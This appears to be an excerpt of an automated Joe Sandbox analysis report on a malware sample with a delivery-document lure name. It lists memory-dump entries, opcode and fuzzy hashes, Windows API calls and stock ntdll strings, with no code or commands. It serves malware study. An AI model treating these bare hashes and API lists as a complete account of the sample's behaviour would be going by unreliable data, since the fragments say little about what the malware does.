                        • Opcode Fuzzy Hash: 09f42c393b701be5218807fecbebc7c635d16c04a30f294439d662fff01961e4
                        • Instruction Fuzzy Hash: 0F9002B520150442D5107158584564A004A97D0701F55D411A4424558EC654C9A1A221
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6ac0382a0ba044d2991fc900b5b2f2a03f01d9e0e5ef888850370e4c4d84477
                        • Instruction ID: af9792022d51671b032772b2a875dfc2ef98eb928cded59aa361bffcbe40a5f4
                        • Opcode Fuzzy Hash: b6ac0382a0ba044d2991fc900b5b2f2a03f01d9e0e5ef888850370e4c4d84477
                        • Instruction Fuzzy Hash: EB9002B120250182954072585845A4E410997E1702B95D415A4015554DC914C9615321
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                        • Instruction ID: 725614c8d81029feccd9e1944bbfb00ba00ec8023010370befa4786222298689
                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                        • Instruction Fuzzy Hash:
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                        • API String ID: 48624451-2108815105
                        • Opcode ID: d327fa5c934b2539746ea30e73c447ede12b112e2a13d30ef0d27d87f3e2621a
                        • Instruction ID: c8656019b83670ce1be57c4f24e407146c2c82784ed422b23a16ef5054665883
                        • Opcode Fuzzy Hash: d327fa5c934b2539746ea30e73c447ede12b112e2a13d30ef0d27d87f3e2621a
                        • Instruction Fuzzy Hash: 7251E3B6A00156EECB61DB9D89C097EFBF8BB08244714826AE8A5D7641D334DF9087A0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                        • API String ID: 48624451-2108815105
                        • Opcode ID: 6f06e2c4243449f0fc2b1a44ff974264403abd99dd200b5164ba6f6acb599b68
                        • Instruction ID: 966b90679a1e936219355b567865d752e14f274a5cdb84344d3be3b354c022af
                        • Opcode Fuzzy Hash: 6f06e2c4243449f0fc2b1a44ff974264403abd99dd200b5164ba6f6acb599b68
                        • Instruction Fuzzy Hash: C851E275A00646EFCB31DE9DC89097FFBF8EB54600B04846EE596D7682E6B4EF408760
                        Strings
                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01C84725
                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01C84787
                        • ExecuteOptions, xrefs: 01C846A0
                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01C846FC
                        • Execute=1, xrefs: 01C84713
                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01C84655
                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01C84742
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                        • API String ID: 0-484625025
                        • Opcode ID: 9f760b1f846568f0b73651fa749dd5d165fd4d731ccc4a91ec7df5bfda9d05c4
                        • Instruction ID: 741f4b51b6cc94dbf0b7f2b913c56b30f4d2a38cdf0fbc3454b59e46e1c67a18
                        • Opcode Fuzzy Hash: 9f760b1f846568f0b73651fa749dd5d165fd4d731ccc4a91ec7df5bfda9d05c4
                        • Instruction Fuzzy Hash: 9A51163160431AEBEF25EBA9DC89BEA7BB9EF14304F0404D9D605A7191EB70DA458F50
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                        • Instruction ID: db6ed605f01430ae4d298a249e5819f4f21ee5ddd26b59d31545598d998e0ce5
                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                        • Instruction Fuzzy Hash: AA022471518342EFD709CF18C498A6BBBE5EFD8704F44892DF9898B260DB31E945CB82
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-$0$0
                        • API String ID: 1302938615-699404926
                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                        • Instruction ID: 8efae6f526143f9d6e22c2a0f3fc99a24a620860efc0a13b9e286248968ea9c1
                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                        • Instruction Fuzzy Hash: 5281B170A45249CEEF698E6CC8917BEBFA3AF45350F184159DC61A7291CB34CEC08769
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: %%%u$[$]:%u
                        • API String ID: 48624451-2819853543
                        • Opcode ID: a1cc29f0e07830d388651f4b2d1a306d522e41afc77c12fcc3b0fc40a5a6e918
                        • Instruction ID: 0ed8577362bb70366c31b98195ccec7e8527088c400aa4e5691f8736e1a2ba16
                        • Opcode Fuzzy Hash: a1cc29f0e07830d388651f4b2d1a306d522e41afc77c12fcc3b0fc40a5a6e918
                        • Instruction Fuzzy Hash: B121357AA00119EBDB11DFB9DC40AEE7BF9EF94A54F44012AED05E3240E730DE519BA1
                        Strings
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01C802E7
                        • RTL: Re-Waiting, xrefs: 01C8031E
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01C802BD
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                        • API String ID: 0-2474120054
                        • Opcode ID: 4b294903890d4a2e3552adb4f975b2ec067ea5730dfdf8d02a52873ad741b939
                        • Instruction ID: b40c24f7b3b0efa8f263b6464392b42155506e8d8af410b47b44094bdf5e18c3
                        • Opcode Fuzzy Hash: 4b294903890d4a2e3552adb4f975b2ec067ea5730dfdf8d02a52873ad741b939
                        • Instruction Fuzzy Hash: A0E1B030A04742DFD726DF28C884B2ABBE0BB85728F140A5DF5A5CB2E1D774D958CB42
                        Strings
                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01C87B7F
                        • RTL: Resource at %p, xrefs: 01C87B8E
                        • RTL: Re-Waiting, xrefs: 01C87BAC
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                        • API String ID: 0-871070163
                        • Opcode ID: bd0aaeaf6dbcd807637299b6063b4c903de234b1e3e42e1727ab100afa8eb82f
                        • Instruction ID: 035eedd8ef18a2ca073519d6e796323ba94e760d7c7310d7f3f0990564513638
                        • Opcode Fuzzy Hash: bd0aaeaf6dbcd807637299b6063b4c903de234b1e3e42e1727ab100afa8eb82f
                        • Instruction Fuzzy Hash: A441D235304702DFEB25DE29C940B6AB7E5EF98710F100A1DFA5ADB680DB31E945CB91
                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C8728C
                        Strings
                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01C87294
                        • RTL: Resource at %p, xrefs: 01C872A3
                        • RTL: Re-Waiting, xrefs: 01C872C1
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                        • API String ID: 885266447-605551621
                        • Opcode ID: 265367975c329b684c6e55e52fa5bede2006fb60f58e59dca118cf1c5bdc1a83
                        • Instruction ID: bdf09c76c52d77e6d15bf4cc337715f41ccd1898f70ba60495e6ce6a0f8e7a0b
                        • Opcode Fuzzy Hash: 265367975c329b684c6e55e52fa5bede2006fb60f58e59dca118cf1c5bdc1a83
                        • Instruction Fuzzy Hash: 42410231704702EBDB21EE29CC81B6ABBA5FB94714F200619F955EB640EB31F952CBD1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: %%%u$]:%u
                        • API String ID: 48624451-3050659472
                        • Opcode ID: d6a94df141355a755fea51af3b42c930ebd1e579a443ada21c8160e2df9dab92
                        • Instruction ID: 58814cd53178e8d849312857d8c3ee34db8e9fc4cd1f16e4df72d93d03fba79b
                        • Opcode Fuzzy Hash: d6a94df141355a755fea51af3b42c930ebd1e579a443ada21c8160e2df9dab92
                        • Instruction Fuzzy Hash: 26315772600119DFDB21DE29CC40BEE77BCEB54A10F44459AE949E3240EB30DE549B60
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-
                        • API String ID: 1302938615-2137968064
                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                        • Instruction ID: d4b3575a2f56ede44a47e5f9003d57d5569d4f955aea489c5db09f8b236a0357
                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                        • Instruction Fuzzy Hash: 1991A371E00316DEEBA4DF6EC8806BEBBA5AF44320F94461AED55A72C0D674CAC0C759
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID: $$@
                        • API String ID: 0-1194432280
                        • Opcode ID: d1c85d340ad56023d81f0c7a1ebcaa77952d1955a7bc1d0482770f53eb3f70af
                        • Instruction ID: 7aba078901577724d8f6b9e4166f8f06433aae4b85d80a564ebcf712381dc3ab
                        • Opcode Fuzzy Hash: d1c85d340ad56023d81f0c7a1ebcaa77952d1955a7bc1d0482770f53eb3f70af
                        • Instruction Fuzzy Hash: B4813C71D00269DBDB35CB54CC48BEEB7B4AB48714F0041EAEA19B7280D7709E84DFA0

                        Execution Graph

                        Execution Coverage:12.3%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:100
                        Total number of Limit Nodes:8

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0076B01E
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 28ec6f558b84b070c3ed4242c2e6db03509ed46f3a38b8416a6b64bb03c963d3
                        • Instruction ID: 47ac7f704e049a09bc92cf6d6e2711049d4cada9d70a7708e882f434067771ac
                        • Opcode Fuzzy Hash: 28ec6f558b84b070c3ed4242c2e6db03509ed46f3a38b8416a6b64bb03c963d3
                        • Instruction Fuzzy Hash: E77123B0A00B059FD724DF29D45579ABBF1FF88304F10892EE886EBA40D779E8458F91

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04A11A02
                        Memory Dump Source
                        • Source File: 00000009.00000002.2465947779.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4a10000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 6b3430a875423e858a6096ced6e951112f740d467ec9faf68d4b81855f04912c
                        • Instruction ID: cd8af8c599b8f687b633287487cea66e7d7c607e41bb22ff4bcc1a0db26cbbc3
                        • Opcode Fuzzy Hash: 6b3430a875423e858a6096ced6e951112f740d467ec9faf68d4b81855f04912c
                        • Instruction Fuzzy Hash: 7F51D1B1D00309DFDB14CFA9C984ADDBFB1BF48310F64822AE419AB260D775A945CF91

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04A11A02
                        Memory Dump Source
                        • Source File: 00000009.00000002.2465947779.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4a10000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: b946c3bc365cdf9322116bb5b52e7865453c1eb30cf9c66840413618f270e83b
                        • Instruction ID: aa02353af34a8deda7a11ce979bdd5db75473206a7f58c1667de136dd9c34b42
                        • Opcode Fuzzy Hash: b946c3bc365cdf9322116bb5b52e7865453c1eb30cf9c66840413618f270e83b
                        • Instruction Fuzzy Hash: A141C2B1D00309DFDB14CF99C884ADEBFB5BF48310F64822AE419AB210D775A945CF91

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: acf3f9494d033779d1dda1c85c7d8e81a2805949f06f943922e2a094dc07f984
                        • Instruction ID: 202790bd84328cdad9447d39b41d369c305fb01aa4a52fab624135d524eda6d0
                        • Opcode Fuzzy Hash: acf3f9494d033779d1dda1c85c7d8e81a2805949f06f943922e2a094dc07f984
                        • Instruction Fuzzy Hash: 5A31AFB1804B48CFDB11CFA8C885AEDBFF0EF55314F148159C816AB251D7796946EF41

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 007659C9
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 5fa5d27f68cc98ee8c7f2cbb2d9b77fd1a5346ab8be70db4e5baa359ac308286
                        • Instruction ID: 05b88c06389d1b584023105aeaab6396512c987593dfad9da2e6cbb8f31f21a3
                        • Opcode Fuzzy Hash: 5fa5d27f68cc98ee8c7f2cbb2d9b77fd1a5346ab8be70db4e5baa359ac308286
                        • Instruction Fuzzy Hash: 0C41E2B1D00719CFDB24DFA9C884BCDBBB1BF88304F24816AD419AB251DB756946CF91

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 007659C9
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: a157e4d479c2fb23c94d75de2c7daa3e679d6635bd7c2598c89373a1bf49ae60
                        • Instruction ID: 3849c28af672c958553dd0cc5667e7c06ac5f862c5a6be747cc1ed8b90fb4267
                        • Opcode Fuzzy Hash: a157e4d479c2fb23c94d75de2c7daa3e679d6635bd7c2598c89373a1bf49ae60
                        • Instruction Fuzzy Hash: 8741D2B1D0071DCBDB24DFA9C884B9DBBF5BF48304F20816AD409AB251DB756946CF91

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 04A14111
                        Memory Dump Source
                        • Source File: 00000009.00000002.2465947779.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4a10000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: b8198d3f7ccae1de2a958e56c6178ae6289bd19d7477b61585c72dbffe99635b
                        • Instruction ID: 0def5e075a839133431efa416341e91bab32834264cf968f10e77a8683b8248b
                        • Opcode Fuzzy Hash: b8198d3f7ccae1de2a958e56c6178ae6289bd19d7477b61585c72dbffe99635b
                        • Instruction Fuzzy Hash: 574117B8A00309DFDB14CF99C848AAABBF5FB8C314F25C459D519AB321D775A845CFA0

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0076D666,?,?,?,?,?), ref: 0076D727
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 7f854719b958a270096d25d6bc6ccfc2845ddb22c6c3e237e26b141b1cf4a88b
                        • Instruction ID: d259550f199acce9bfa015304f0b2734f5558251e8d4bc4f9a051f6275f7232a
                        • Opcode Fuzzy Hash: 7f854719b958a270096d25d6bc6ccfc2845ddb22c6c3e237e26b141b1cf4a88b
                        • Instruction Fuzzy Hash: 6B2103B5D102489FDB10CF9AD484AEEBBF8EB48310F14801AE919A3310D379A944DFA5

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0076D666,?,?,?,?,?), ref: 0076D727
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 8289a10b3934d35aca29ec6c3601bbeb3782514996ae1a9faf048d84e1a34199
                        • Instruction ID: d763de0c0fa4a6c2a1e209342b124682b3b0855fd4d415b9622871d2c056c26a
                        • Opcode Fuzzy Hash: 8289a10b3934d35aca29ec6c3601bbeb3782514996ae1a9faf048d84e1a34199
                        • Instruction Fuzzy Hash: D42100B5D00209DFDB10CFAAD584ADEBBF5EB48310F14801AE859A7250C378A945CFA1

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0076B099,00000800,00000000,00000000), ref: 0076B2AA
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 27d8f4bbb41c75b20d24431de31a0eeb962ab06e449ee56fef7b08a48cd1f01c
                        • Instruction ID: 93d481e69e5c212bb25d28b45dc0891836a09aed9f9e6df92547e64bdec7a288
                        • Opcode Fuzzy Hash: 27d8f4bbb41c75b20d24431de31a0eeb962ab06e449ee56fef7b08a48cd1f01c
                        • Instruction Fuzzy Hash: C211D3B6D003499FDB10DF9AD444A9EFBF4FB89320F10842AD91AA7600C379A945CFA5
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0076B099,00000800,00000000,00000000), ref: 0076B2AA
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 879191a7bdaa294296a0db9156f8fe8d435221321bafc9393ccd5687db58641e
                        • Instruction ID: 6e784ec364da7a5c6b764ad18f427d2cbddfcbc491db548452b5ebb77133b43c
                        • Opcode Fuzzy Hash: 879191a7bdaa294296a0db9156f8fe8d435221321bafc9393ccd5687db58641e
                        • Instruction Fuzzy Hash: 021112B6C00209CFDB10CFAAD544BDEFBF5AB88310F14842AD829A7610C379A945CFA5
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0076B01E
                        Memory Dump Source
                        • Source File: 00000009.00000002.2244070206.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_760000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: eab2008abf19673853275cca1801b5e4a04738ab4926b01140e8145da13dfbf0
                        • Instruction ID: 0caf61aa912f1e34b40751747b43537ebed63b3e5040a5cdc74013783cfab915
                        • Opcode Fuzzy Hash: eab2008abf19673853275cca1801b5e4a04738ab4926b01140e8145da13dfbf0
                        • Instruction Fuzzy Hash: B511DFB5C002498FCB14CF9AD444BDEFBF4AB89314F10842AD829A7610D379A549CFA1
                        Memory Dump Source
                        • Source File: 00000009.00000002.2203445222.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6fd000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b260caf44c206bb3dc6bc3b2f2c561f8641ae943d7b64bf02ce33ebda12045cf
                        • Instruction ID: fac5b912b97b734b59a1f9883c22956f976b8808b25bea43c885d1fa95fafcca
                        • Opcode Fuzzy Hash: b260caf44c206bb3dc6bc3b2f2c561f8641ae943d7b64bf02ce33ebda12045cf
                        • Instruction Fuzzy Hash: 5321D6B1504248DFDB05DF14D9C0B36BF67FB94318F24C569DA050B256C336E856D6A1
                        Memory Dump Source
                        • Source File: 00000009.00000002.2203445222.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6fd000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 841a0391daf3953694726e73080f2557f925389d0f6f3888e6ccf10c073e5660
                        • Instruction ID: cae553afc0b6fe618b5d81adeaec8ff10e555d25ff0fbf4f08bb27e1986e79cf
                        • Opcode Fuzzy Hash: 841a0391daf3953694726e73080f2557f925389d0f6f3888e6ccf10c073e5660
                        • Instruction Fuzzy Hash: 2C2128B1504208DFDB05DF14D9C0B2ABFA7FB94314F24C569DA090B356C336F856C6A2
                        Memory Dump Source
                        • Source File: 00000009.00000002.2211676135.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_70d000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cdbb5b0f7aa5632246ec8bc5247dcf69808f4c322bcc8c4b8ec892222503adeb
                        • Instruction ID: 26401c07a46cba3e3b6942efc3327689544f008560746eec06a6cf9c305de424
                        • Opcode Fuzzy Hash: cdbb5b0f7aa5632246ec8bc5247dcf69808f4c322bcc8c4b8ec892222503adeb
                        • Instruction Fuzzy Hash: 0221F2B1504304EFDB25DF94D9C0B26BBA5FB88314F24C66DE8094B296C33ADC16CA61
                        Memory Dump Source
                        • Source File: 00000009.00000002.2211676135.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_70d000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 58464b83c265ab603237413e8e95abfe0e2a5fb43796fa8469bde3eab66bcf43
                        • Instruction ID: 79d9953c2db1ce63bdd0e07d0e3ccdb6ff120b66ade5b6fd468ac5007dc04ce6
                        • Opcode Fuzzy Hash: 58464b83c265ab603237413e8e95abfe0e2a5fb43796fa8469bde3eab66bcf43
                        • Instruction Fuzzy Hash: 4621D0B1604344EFDB24DF94D9C4B26BBA5EB88314F24C669D84E4B286C37ADC07CA61
                        Memory Dump Source
                        • Source File: 00000009.00000002.2203445222.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6fd000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction ID: caa4b30e5175cb8835db1c5679eb3d5d43607694a3be81c9be30236e42029b2a
